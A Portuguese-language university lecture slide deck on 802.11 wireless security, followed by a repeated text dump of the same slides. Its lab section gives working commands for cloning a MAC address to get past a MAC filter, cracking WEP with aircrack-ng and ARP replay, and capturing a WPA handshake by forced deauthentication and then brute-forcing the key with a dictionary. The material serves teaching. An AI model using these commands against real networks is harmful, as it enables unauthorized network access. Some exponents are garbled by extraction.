Tecnologia em Redes de
              Computadores


Gerência de Redes


Prática de Ataques - wireless


Professor: André Peres
andre.peres@poa.ifrs.edu.br

Instituto Federal do Rio Grande do Sul - IFRS
Porto Alegre
Enlace IEEE 802.11
Existem 3 tipos de enlace
IBSS (Independent Basic Service Set) = ad-hoc

BSS (Basic Service Set)

ESS (Extended Service Set)
Enlace IEEE 802.11
IBSS ou ad-hoc
Criada de maneira espontânea
Área de abrangência pequena
Sem controle centralizado
Enlace IEEE 802.11
BSS
Controle centralizado (AP – Access Point)
    • Concentrador (hub) para rede sem fios
    • Comutador (switch) entre enlaces com/sem fio
    • Área de abrangência definida pelo AP
Enlace IEEE 802.11
ESS
Múltiplos BSSs
APs se comunicam via DS (distributed system)
Objetivo: roaming
Enlace IEEE 802.11
Ligação entre redes:
Pode utilizar BSS ou IBSS
Com BSS
    • Um AP
    • Dois APs (um é configurado como cliente)
Enlace IEEE 802.11
Nível de enlace IEEE 802.11
    Controle de comunicação de nível físico
    Baseado no padrão IEEE 802.3 (ethernet)
    Utiliza endereços MAC compatíveis com ethernet
    Controle de acesso ao meio: CSMA/CA
    Controle de erros tipo stop-and-wait
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Deve respeitar uma máquina de estados:
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
    • Tipo de rede (BSSType)
       – Ad-hoc
       – Infra estrutura (BSS)
       – Qualquer

    • Nome da rede (SSID)
       – Uma rede específica
       – Qualquer rede
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
    • Tipo de descoberta da rede (scan type)
       – Passivo → aguarda beacon frames
       – Ativo → utiliza probe request

    • Canal a ser utilizado (channel)
       – Especifica um canal 1 → 11
       – Qualquer canal (faz varredura de todos em busca da rede)
Enlace IEEE 802.11
Para conexão de uma estação com a rede
A estação deve “encontrar” a rede
    • O AP divulga sua existência através de beacon frames
Enlace IEEE 802.11
Para conexão de uma estação com a rede
  • Por segurança o AP pode não divulgar o nome da rede,
     obrigando a estação a utilizar probe request
Enlace IEEE 802.11
Para conexão de uma estação com a rede
  • O AP responde ao Probe Request com um Probe
     Response:
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a identificação do SSID e troca de mensagens
iniciais
    • Estado 1 → Não autenticado, Não associado
Passa-se para a fase de autenticação
    • Padrão inicial:
       – Open System
       – Shared Key (WEP)
    • Adicionados Posteriormente:
       – PSK - Pre-Shared Key (WPA, WPA2)
       – 802.1x (WEP, WPA, WPA2)
Enlace IEEE 802.11
Autenticação Open System
Autenticação nula
Qualquer estação é autenticada por padrão
Protocolo:
     1 → Estação envia uma requisição de autenticação
     2 → AP aceita a autenticação (sempre successfull)
Enlace IEEE 802.11
Autenticação Shared Key
Utiliza WEP com texto desafio
    • O WEP utiliza criptografia simétrica (chave única)
Enlace IEEE 802.11
Autenticação Pre-Shared Key
Similar ao Shared Key
A chave é utilizada apenas na autenticação
Autenticação 802.1x
Necessita de um servidor RADIUS
O AP serve como um NAS (Network Access Server)
A comunicação ocorre entre cliente e servidor RADIUS
O servidor RADIUS informa ao AP o resultado da
autenticação
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a autenticação
    • Estado 2 → Autenticado, Não associado

Fase de associação
    • Passagem automática do estado 2 → 3
    • Estado 3 → Autenticado, Associado
    • Agora a estação pode receber/transmitir quadros de
       enlace na rede
    • Acesso ao servidor DHCP, etc...
Segurança IEEE 802.11
 A autenticação faz parte do processo de
segurança
Após a autenticação, a estação passa para o
estado de autenticado/associado
Somente neste estado, a estação pode trocar
quadros de enlace com a rede
Segurança IEEE 802.11
Criptografia
WEP (Wired Equivalent Privacy)
    • Baseia-se na dificuldade do atacante em obter um
       segredo compartilhado entre as estações
    • Utiliza criptografia simétrica
       – Mesma chave para cifragem e decifragem de quadros
    • Baseado no algoritmo RC4
       – Não é uma implementação pura do RC4
       – Foram feitas modificações...
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Criptografia simétrica utilizando operações XOR
Necessita de uma chave com o mesmo tamanho da
mensagem (inviável)
Para contornar este problema utiliza o gerador de
números pseudo-aleatórios (PRNG) do RC4
Funcionamento: utiliza uma SEMENTE secreta para
gerar a chave de cifragem do mesmo tamanho da
mensagem
Segurança IEEE 802.11
WEP
A chave não pode ser reaproveitada em dois quadros

MSG [XOR] CIF → CHAVE

Se atacante insere ou conhece a mensagem original
e captura mensagem cifrada, obtém a chave utilizada
Segurança IEEE 802.11
WEP
Utilização de chave única → problema de sincronismo
!
Segurança IEEE 802.11
WEP
Necessária chave única, para cada quadro de enlace
Quadros de até 3000 bytes a 54 Mbps = muitas
chaves diferentes por segundo
Uma semente gera uma chave...
A mesma semente deve ser utilizada por todas as
estações
Segurança IEEE 802.11
WEP
Solução → utilização de um vetor de inicialização em
conjunto com a semente

IV (Initialization Vector) → 24 bits randômicos
    • Deve ser divulgado para a estação que irá decifrar o
       quadro
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
O segredo permanece o mesmo, enquanto o IV é
alterado a cada quadro de enlace

IV → 24 bits

Segredo → 5 bytes → 40 bits = WEP64

Segredo → 13 bytes → 104 bits = WEP128
Segurança IEEE 802.11
Problemas do WEP
Utilização de chaves repetidas
IV → 24 bits → 224 combinações
Quadros de 1500 bytes a 11 Mbps
(1500 x 8 x 224) / (11 x 106)= 1800 segundos
Aproximadamente 5 horas
Excluindo possibilidade de 2 máquinas utilizarem o
mesmo IV.... .... ...
Segurança IEEE 802.11
Problemas do WEP
Os bits permanecem na mesma posição do quadro...
    • Se atacante deseja alterar um bit, basta inverter o seu
       valor
    • Além disso, deve identificar a alteração no CRC32
Se atacante captura uma chave, já pode gerar
pacotes falsos na rede utilizando esta chave/IV
Segurança IEEE 802.11
Problemas do WEP
Pesquisa de Fluhrer, Mantin, Shamir
     “Weaknesses in the key scheduling Algorithm of RC4”
Possíveis chaves fracas no PRNG do RC4
Ao utilizar uma chave fraca, identifica bits da semente
O WEP utiliza muitas sementes diferentes, gerando
muitas chaves fracas
Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort




    Total de pacotes: 2,5 milhões

                      Pacotes “interessantes”: 1878

                                         Segredo: xC513
Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort




  Total de pacotes: 7,3 milhões

                 Pacotes “interessantes”: 4160

                                  Segredo: xCd513ewq1pkm
Segurança IEEE 802.11
Problemas do WEP
Análise dos bits iniciais de uma mensagem cifrada
    • O LLC inclui sempre os mesmos bits: 0xaa

Inferir através de análise probabilística os bits da
semente (os primeiros bits são o IV)

Isto facilita a descoberta dos demais bits da semente
(segredo compartilhado)
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Após descoberta das vulnerabilidades WEP
Criado grupo de trabalho IEEE 802.11i
    • Responsável pelo novo protocolo de segurança 802.11
    • Reuniões entre fabricantes e comunidade científica
Fornecedores preocupados
    •   Demora com 802.11i
    •   Criada Wi-Fi Alliance
    •   Necessidade de compatibilidade com hardware antigo
    •   Apenas atualização de firmware
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Para manter o hardware → novo esquema rodando
sobre protocolo antigo (WEP)
Protocolo WPA (ano: 2002)
   • Mantém o WEP
   • Contém mecanismo de troca de segredo (parte da
      semente além do IV) periodicamente → TKIP
      (Temporal Key Integrity Protocol)
   • Permite autenticação via PSK ou 802.1x
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
MICHAEL
   • Substitui o CRC32 para verificação de integridade de
      mensagens
   • Gera um cálculo de 64 bits
   • Serve para impedir que um atacante consiga inserir
      quadros em uma rede cifrada
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
TKIP
       • Troca dinâmica de segredo
       • Necessita de um novo mecanismo de autenticação
       • Como o segredo é trocado, não pode utilizar a chave dinâmica
           como autenticação (o cliente não conhece a chave)
PSK (Pre-Shared Key)
       • Chave “mestra” utilizada no processo de autenticação
       • Utilizada inicialmente para ingresso na rede
       • Após autenticação, estação recebe a chave que está sendo
          utilizada pelas demais estações na rede
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
PSK (Pre-Shared Key)
   • É o ponto pelo qual um atacante tenta obter acesso à
      rede
   • Atacante captura processo de autenticação e tenta
      identificar a PSK utilizada neste processo
   • Ao obter a PSK, consegue entrar na rede
   • Como o número de quadros trocados na autenticação é
      pequeno, o ataque deve ser baseado em força bruta
   • Força bruta → dicionário de senhas + software de
      análise da autenticação WPA
Segurança IEEE 802.11
WPA + 802.1x
  • Alternativa ao PSK
  • Não possui chave inicial
  • Usuário deve se autenticar com servidor RADIUS
     – PEAP (usuário/senha)
     – Certificado
     – …
  • Necessário servidor RADIUS
  • AP serve como ponte entre estação e RADIUS
Segurança IEEE 802.11
802.1x
  • Baseado no conceito de “portas”
     – Enquanto a estação não finaliza o processo de autenticação fica com a
         “porta” para a rede fechada
     – A única comunicação permitida é com o servidor RADIUS
     – Apenas no final da autenticação com sucesso (indicada pelo servidor
         RADIUS para o AP) o AP libera o acesso
  • Processo de autenticação ocorre no nível de enlace
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
  • No caso de uso de certificados, apenas quem possui
     certificado válido (CA) pode acessar a rede
  • No caso de EAP, verificado usuário/senha
     – Possibilidade de força bruta
  • O AP é autenticado junto ao RADIUS, impedindo AP
     falso
  • Possibilidade de ataques com AP+RADIUS falsos
     – Atacante realiza a autenticação do cliente
     – Não funciona com TLS (autenticação mútua AP ↔ Estação) via
         certificados
Segurança IEEE 802.11
WPA2 (IEEE 802.11i)
Ano: 2004
Substituição total do protocolo criptográfico
Utilização do AES(Advanced Encryption Standard)
    • Robusto
    • Sem ataques à criptografia conhecidos
    • Padrão de criptografia adotado por diversos
       softwares/equipamentos
Incompatível com equipamentos anteriores
Autenticação via PSK e 802.1x, Criptografia AES
Segurança IEEE 802.11
Na prática
WEP → fora !
Usuário doméstico/SOHO:
    • Equipamentos antigos ( → 2004): WPA/PSK
    • Equipamentos novos (2004 → ): WPA2/PSK
Usuário empresarial:
    • Equipamentos antigos ( → 2004) : WPA/802.1x
    • Equipamentos novos (2004 → ) : WPA2/802.1x
Ataques
Visão do atacante:
1. criptografia
nenhuma
WEP
WPA
WPA-2
Ataques
Visão do atacante:
2. autenticação
nenhuma
shared-key
PSK
802.1x
Ataques
Visão do atacante:
3. mecanismos adicionais
nenhum
Filtro MAC
SSID escondido
Mecanismos layer 3 (firewall, etc...)
Ataques
Cenários de testes:
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
2 – WEP
Ataque: quebra do WEP via software
3 – WPA
Ataque: desconexão de um cliente + captura
de autenticação + força bruta
Ataques
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
Passos:
Descoberta do SSID:

- colocar a placa de redes sem fios em modo
monitor
- capturar tráfego via wireshark, tcpdump,
etc....
Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up



Executar o wireshark e aguardar os “probes”
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
Ataques
1 – AP com SSID escondido e filtro de MAC
Buscar por pacotes de probe (OK)
Buscar pelo MAC address de uma estação que
está navegando
Identificar faixa de endereços IP utilizados e
buscar por um IP que não está sendo usado
Objetivo:
Mesmo MAC, IP diferente....
Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:

- placa em modo monitor
- wireshark...
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
  Atacante     Alvo


     ...         ...
                                        AP

  10.1.1.1    10.1.1.2                  IP

   AA:AA      AA:AA            MAC           MAC

   Físico      Físico          Físico        Físico
Ataques
1 – AP com SSID escondido e filtro de MAC
                        Alvo envia um quadro
Clonagem de MAC:       AP verifica MAC origem
  Atacante       Alvo                          OK !

     ...           ...
                                                            AP

  10.1.1.1     10.1.1.2                                     IP

   AA:AA        AA:AA                              MAC           MAC

   Físico       Físico                             Físico        Físico


               MAC D | MAC O |   IP O   |   IP D
                                                            OK !

                11:11 AA:AA 10.1.1.2 200.1.1.1
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
  Atacante     Alvo                       Volta a resposta

     ...         ...
                                                          AP

  10.1.1.1    10.1.1.2                                    IP

   AA:AA      AA:AA                              MAC           MAC

   Físico      Físico                            Físico        Físico


             MAC D | MAC O |   IP O   |   IP D
              AA:AA 11:11 200.1.1.1 10.1.12
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:           As duas placas de
  Atacante      Alvo                           rede aceitam...
                                           e repassam para o IP

     ...          ...
                                                            AP

  10.1.1.1     10.1.1.2                                     IP

   AA:AA       AA:AA                               MAC           MAC

   Físico       Físico                             Físico        Físico


              MAC D | MAC O |   IP O   |    IP D
               AA:AA 11:11 200.1.1.1 10.1.12
Ataques
                                          IP destino = 10.1.1.1?
1 – AP com SSID escondido e filtro de MAC         NÃO !
                                           Eu sou um roteador?
Clonagem de MAC:                                  NÃO !
  Atacante     Alvo                       → descarta o pacote !!!

     ...         ...
                                                            AP

  10.1.1.1    10.1.1.2                                      IP

   AA:AA      AA:AA                                MAC           MAC

   Físico      Físico                              Físico        Físico


             MAC D | MAC O |   IP O   |     IP D
              AA:AA 11:11 200.1.1.1 10.1.12
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
Ou seja...
Duas máquinas com mesmo MAC e IP's
diferentes podem “navegar” simultaneamente
(layer3)

… afinal é possível ter uma máquina com mais
de um IP vinculado na mesma placa de rede....
Ataques
 1 – AP com SSID escondido e filtro de MAC
 Clonagem de MAC e associação com AP:
 # killall nm-applet
 # ip l s wlan0 down
 # ip l s wlan0 address 00:1b:77:b9:51:49
 # ip a a 10.1.0.200/24 dev wlan0
 # ip l s wlan0 up
 # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8

# tail -f /var/log/syslog
---------------------------------
kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e
kernel: [ 225.757365] wlan0: beacon received
kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1)
kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401
status=0 aid=1)
kernel: [ 225.785943] wlan0: associated
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
- não utilizar o serviço de DHCP...
- configurar na mão:
→ roteador default
→ servidor de DNS
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
Ataques
2 – Quebra de WEP via software
Vulnerabilidade – PRNG do RC4 gerando
chaves fracas...
Técnica:
1. captura de pacotes cifrados com diferentes
IVs
2. análise dos pacotes (software) para
obtenção do segredo compartilhado
Ataques
2 – Quebra de WEP via software
Passos:
1. colocar a placa de rede em modo monitor
para captura do tráfego cifrado:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up
Ataques
2 – Quebra de WEP via software
Passos:
2. instalação do software aircrack-ng
# apt-get install aircrack-ng


3. captura do tráfego (descoberta das redes)

# airodump-ng wlan0
Ataques
  2 – Quebra de WEP via software
  Passos:
  4. em outro terminal – captura do tráfego
  cifrado de uma rede específica para posterior
  análise
# airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1
wlan0

  5. para diminuir tempo, geração de tráfego
  (requisição de autenticação com o AP)
# aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0
Ataques
 2 – Quebra de WEP via software
 Passos:
 6. captura da requisição de autenticação (os
 pacotes ARP) e repetição dos mesmos para
 geração de mais tráfego
# aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0

 7. Após obter um número significativo de
 pacotes, tentar a análise...
 # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
Ataques
2 – Quebra de WEP via software

Obs: necessário grande volume de tráfego
para análise...
porém, com tráfego suficiente, sempre se
consegue o segredo compartilhado
Ataques
3 – Quebra de WPA via software
Vulnerabilidade:
Mesmo protocolo de autenticação do WEP
quando utilizado PSK

Técnica:
Obtenção dos quadros de associação e
posterior força bruta na PSK
Ataques
  3 – Quebra de WPA via software
  Passos:
  1. colocar a placa de rede em modo monitor
  2. monitorar com airodump-ng
  3. captura de pacotes cifrados (especificar
  WPA)
# airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
Ataques
 3 – Quebra de WPA via software
 Passos:
 4. força a desautenticação de um cliente para
 captura dos quadros de autenticação (falsifica
 mensagem de desaut. do AP)
# aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0

 5. utiliza força bruta (dicionário) para tentar
 obter PSK
 # aircrack-ng -w dicionario.txt wpa1-01.cap

Ataque Redes Wireless - Prática de Ataques

  • 1.
    Tecnologia em Redesde Computadores Gerência de Redes Prática de Ataques - wireless Professor: André Peres andre.peres@poa.ifrs.edu.br Instituto Federal do Rio Grande do Sul - IFRS Porto Alegre
  • 2.
    Enlace IEEE 802.11 Existem3 tipos de enlace IBSS (Independent Basic Service Set) = ad-hoc BSS (Basic Service Set) ESS (Extended Service Set)
  • 3.
    Enlace IEEE 802.11 IBSSou ad-hoc Criada de maneira espontânea Área de abrangência pequena Sem controle centralizado
  • 4.
    Enlace IEEE 802.11 BSS Controlecentralizado (AP – Access Point) • Concentrador (hub) para rede sem fios • Comutador (switch) entre enlaces com/sem fio • Área de abrangência definida pelo AP
  • 5.
    Enlace IEEE 802.11 ESS MúltiplosBSSs APs se comunicam via DS (distributed system) Objetivo: roaming
  • 6.
    Enlace IEEE 802.11 Ligaçãoentre redes: Pode utilizar BSS ou IBSS Com BSS • Um AP • Dois APs (um é configurado como cliente)
  • 7.
    Enlace IEEE 802.11 Nívelde enlace IEEE 802.11 Controle de comunicação de nível físico Baseado no padrão IEEE 802.3 (ethernet) Utiliza endereços MAC compatíveis com ethernet Controle de acesso ao meio: CSMA/CA Controle de erros tipo stop-and-wait
  • 8.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede Deve respeitar uma máquina de estados:
  • 9.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede Configuração da placa cliente • Tipo de rede (BSSType) – Ad-hoc – Infra estrutura (BSS) – Qualquer • Nome da rede (SSID) – Uma rede específica – Qualquer rede
  • 10.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede Configuração da placa cliente • Tipo de descoberta da rede (scan type) – Passivo → aguarda beacon frames – Ativo → utiliza probe request • Canal a ser utilizado (channel) – Especifica um canal 1 → 11 – Qualquer canal (faz varredura de todos em busca da rede)
  • 11.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede A estação deve “encontrar” a rede • O AP divulga sua existência através de beacon frames
  • 12.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede • Por segurança o AP pode não divulgar o nome da rede, obrigando a estação a utilizar probe request
  • 13.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede • O AP responde ao Probe Request com um Probe Response:
  • 14.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede Após a identificação do SSID e troca de mensagens iniciais • Estado 1 → Não autenticado, Não associado Passa-se para a fase de autenticação • Padrão inicial: – Open System – Shared Key (WEP) • Adicionados Posteriormente: – PSK - Pre-Shared Key (WPA, WPA2) – 802.1x (WEP, WPA, WPA2)
  • 15.
    Enlace IEEE 802.11 AutenticaçãoOpen System Autenticação nula Qualquer estação é autenticada por padrão Protocolo: 1 → Estação envia uma requisição de autenticação 2 → AP aceita a autenticação (sempre successfull)
  • 16.
    Enlace IEEE 802.11 AutenticaçãoShared Key Utiliza WEP com texto desafio • O WEP utiliza criptografia simétrica (chave única)
  • 17.
    Enlace IEEE 802.11 AutenticaçãoPre-Shared Key Similar ao Shared Key A chave é utilizada apenas na autenticação Autenticação 802.1x Necessita de um servidor RADIUS O AP serve como um NAS (Network Access Server) A comunicação ocorre entre cliente e servidor RADIUS O servidor RADIUS informa ao AP o resultado da autenticação
  • 18.
    Enlace IEEE 802.11 Paraconexão de uma estação com a rede Após a autenticação • Estado 2 → Autenticado, Não associado Fase de associação • Passagem automática do estado 2 → 3 • Estado 3 → Autenticado, Associado • Agora a estação pode receber/transmitir quadros de enlace na rede • Acesso ao servidor DHCP, etc...
  • 19.
    Segurança IEEE 802.11 A autenticação faz parte do processo de segurança Após a autenticação, a estação passa para o estado de autenticado/associado Somente neste estado, a estação pode trocar quadros de enlace com a rede
  • 20.
    Segurança IEEE 802.11 Criptografia WEP(Wired Equivalent Privacy) • Baseia-se na dificuldade do atacante em obter um segredo compartilhado entre as estações • Utiliza criptografia simétrica – Mesma chave para cifragem e decifragem de quadros • Baseado no algoritmo RC4 – Não é uma implementação pura do RC4 – Foram feitas modificações...
  • 21.
  • 22.
  • 23.
    Segurança IEEE 802.11 WEP Criptografiasimétrica utilizando operações XOR Necessita de uma chave com o mesmo tamanho da mensagem (inviável) Para contornar este problema utiliza o gerador de números pseudo-aleatórios (PRNG) do RC4 Funcionamento: utiliza uma SEMENTE secreta para gerar a chave de cifragem do mesmo tamanho da mensagem
  • 24.
    Segurança IEEE 802.11 WEP Achave não pode ser reaproveitada em dois quadros MSG [XOR] CIF → CHAVE Se atacante insere ou conhece a mensagem original e captura mensagem cifrada, obtém a chave utilizada
  • 25.
    Segurança IEEE 802.11 WEP Utilizaçãode chave única → problema de sincronismo !
  • 26.
    Segurança IEEE 802.11 WEP Necessáriachave única, para cada quadro de enlace Quadros de até 3000 bytes a 54 Mbps = muitas chaves diferentes por segundo Uma semente gera uma chave... A mesma semente deve ser utilizada por todas as estações
  • 27.
    Segurança IEEE 802.11 WEP Solução→ utilização de um vetor de inicialização em conjunto com a semente IV (Initialization Vector) → 24 bits randômicos • Deve ser divulgado para a estação que irá decifrar o quadro
  • 28.
  • 29.
  • 30.
    Segurança IEEE 802.11 WEP Osegredo permanece o mesmo, enquanto o IV é alterado a cada quadro de enlace IV → 24 bits Segredo → 5 bytes → 40 bits = WEP64 Segredo → 13 bytes → 104 bits = WEP128
  • 31.
    Segurança IEEE 802.11 Problemasdo WEP Utilização de chaves repetidas IV → 24 bits → 224 combinações Quadros de 1500 bytes a 11 Mbps (1500 x 8 x 224) / (11 x 106)= 1800 segundos Aproximadamente 5 horas Excluindo possibilidade de 2 máquinas utilizarem o mesmo IV.... .... ...
  • 32.
    Segurança IEEE 802.11 Problemasdo WEP Os bits permanecem na mesma posição do quadro... • Se atacante deseja alterar um bit, basta inverter o seu valor • Além disso, deve identificar a alteração no CRC32 Se atacante captura uma chave, já pode gerar pacotes falsos na rede utilizando esta chave/IV
  • 33.
    Segurança IEEE 802.11 Problemasdo WEP Pesquisa de Fluhrer, Mantin, Shamir “Weaknesses in the key scheduling Algorithm of RC4” Possíveis chaves fracas no PRNG do RC4 Ao utilizar uma chave fraca, identifica bits da semente O WEP utiliza muitas sementes diferentes, gerando muitas chaves fracas
  • 34.
    Segurança IEEE 802.11 Problemasdo WEP Programas WEPCrack e AirSnort Total de pacotes: 2,5 milhões Pacotes “interessantes”: 1878 Segredo: xC513
  • 35.
    Segurança IEEE 802.11 Problemasdo WEP Programas WEPCrack e AirSnort Total de pacotes: 7,3 milhões Pacotes “interessantes”: 4160 Segredo: xCd513ewq1pkm
  • 36.
    Segurança IEEE 802.11 Problemasdo WEP Análise dos bits iniciais de uma mensagem cifrada • O LLC inclui sempre os mesmos bits: 0xaa Inferir através de análise probabilística os bits da semente (os primeiros bits são o IV) Isto facilita a descoberta dos demais bits da semente (segredo compartilhado)
  • 37.
    Segurança IEEE 802.11 WPA(Wi-fi Protected Access) Após descoberta das vulnerabilidades WEP Criado grupo de trabalho IEEE 802.11i • Responsável pelo novo protocolo de segurança 802.11 • Reuniões entre fabricantes e comunidade científica Fornecedores preocupados • Demora com 802.11i • Criada Wi-Fi Alliance • Necessidade de compatibilidade com hardware antigo • Apenas atualização de firmware
  • 38.
    Segurança IEEE 802.11 WPA(Wi-fi Protected Access) Para manter o hardware → novo esquema rodando sobre protocolo antigo (WEP) Protocolo WPA (ano: 2002) • Mantém o WEP • Contém mecanismo de troca de segredo (parte da semente além do IV) periodicamente → TKIP (Temporal Key Integrity Protocol) • Permite autenticação via PSK ou 802.1x
  • 39.
    Segurança IEEE 802.11 WPA(Wi-fi Protected Access) MICHAEL • Substitui o CRC32 para verificação de integridade de mensagens • Gera um cálculo de 64 bits • Serve para impedir que um atacante consiga inserir quadros em uma rede cifrada
  • 40.
    Segurança IEEE 802.11 WPA(Wi-fi Protected Access) TKIP • Troca dinâmica de segredo • Necessita de um novo mecanismo de autenticação • Como o segredo é trocado, não pode utilizar a chave dinâmica como autenticação (o cliente não conhece a chave) PSK (Pre-Shared Key) • Chave “mestra” utilizada no processo de autenticação • Utilizada inicialmente para ingresso na rede • Após autenticação, estação recebe a chave que está sendo utilizada pelas demais estações na rede
  • 41.
    Segurança IEEE 802.11 WPA(Wi-fi Protected Access) PSK (Pre-Shared Key) • É o ponto pelo qual um atacante tenta obter acesso à rede • Atacante captura processo de autenticação e tenta identificar a PSK utilizada neste processo • Ao obter a PSK, consegue entrar na rede • Como o número de quadros trocados na autenticação é pequeno, o ataque deve ser baseado em força bruta • Força bruta → dicionário de senhas + software de análise da autenticação WPA
  • 42.
    Segurança IEEE 802.11 WPA+ 802.1x • Alternativa ao PSK • Não possui chave inicial • Usuário deve se autenticar com servidor RADIUS – PEAP (usuário/senha) – Certificado – … • Necessário servidor RADIUS • AP serve como ponte entre estação e RADIUS
  • 43.
    Segurança IEEE 802.11 802.1x • Baseado no conceito de “portas” – Enquanto a estação não finaliza o processo de autenticação fica com a “porta” para a rede fechada – A única comunicação permitida é com o servidor RADIUS – Apenas no final da autenticação com sucesso (indicada pelo servidor RADIUS para o AP) o AP libera o acesso • Processo de autenticação ocorre no nível de enlace
  • 44.
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
    Segurança IEEE 802.11 802.1x • No caso de uso de certificados, apenas quem possui certificado válido (CA) pode acessar a rede • No caso de EAP, verificado usuário/senha – Possibilidade de força bruta • O AP é autenticado junto ao RADIUS, impedindo AP falso • Possibilidade de ataques com AP+RADIUS falsos – Atacante realiza a autenticação do cliente – Não funciona com TLS (autenticação mútua AP ↔ Estação) via certificados
  • 55.
    Segurança IEEE 802.11 WPA2(IEEE 802.11i) Ano: 2004 Substituição total do protocolo criptográfico Utilização do AES(Advanced Encryption Standard) • Robusto • Sem ataques à criptografia conhecidos • Padrão de criptografia adotado por diversos softwares/equipamentos Incompatível com equipamentos anteriores Autenticação via PSK e 802.1x, Criptografia AES
  • 56.
    Segurança IEEE 802.11 Naprática WEP → fora ! Usuário doméstico/SOHO: • Equipamentos antigos ( → 2004): WPA/PSK • Equipamentos novos (2004 → ): WPA2/PSK Usuário empresarial: • Equipamentos antigos ( → 2004) : WPA/802.1x • Equipamentos novos (2004 → ) : WPA2/802.1x
  • 57.
    Ataques Visão do atacante: 1.criptografia nenhuma WEP WPA WPA-2
  • 58.
    Ataques Visão do atacante: 2.autenticação nenhuma shared-key PSK 802.1x
  • 59.
    Ataques Visão do atacante: 3.mecanismos adicionais nenhum Filtro MAC SSID escondido Mecanismos layer 3 (firewall, etc...)
  • 60.
    Ataques Cenários de testes: 1– AP com SSID escondido e filtro de MAC Ataque: captura de probes + clonagem de MAC 2 – WEP Ataque: quebra do WEP via software 3 – WPA Ataque: desconexão de um cliente + captura de autenticação + força bruta
  • 61.
    Ataques 1 – APcom SSID escondido e filtro de MAC Ataque: captura de probes + clonagem de MAC Passos: Descoberta do SSID: - colocar a placa de redes sem fios em modo monitor - capturar tráfego via wireshark, tcpdump, etc....
  • 62.
    Ataques 1 – APcom SSID escondido e filtro de MAC Configurando o AP
  • 63.
    Ataques 1 – APcom SSID escondido e filtro de MAC Obtendo o nome da rede: # ip l s wlan0 down # iwconfig wlan0 mode monitor # iwconfig wlan0 channel 8 # ip l s wlan0 up Executar o wireshark e aguardar os “probes”
  • 64.
    Ataques 1 – APcom SSID escondido e filtro de MAC Obtendo o nome da rede:
  • 65.
    Ataques 1 – APcom SSID escondido e filtro de MAC Buscar por pacotes de probe (OK) Buscar pelo MAC address de uma estação que está navegando Identificar faixa de endereços IP utilizados e buscar por um IP que não está sendo usado Objetivo: Mesmo MAC, IP diferente....
  • 66.
    Ataques 1 – APcom SSID escondido e filtro de MAC Configurando o AP
  • 67.
    Ataques 1 – APcom SSID escondido e filtro de MAC Obtendo o MAC de uma estação da rede: - placa em modo monitor - wireshark...
  • 68.
    Ataques 1 – APcom SSID escondido e filtro de MAC Obtendo o MAC de uma estação da rede:
  • 69.
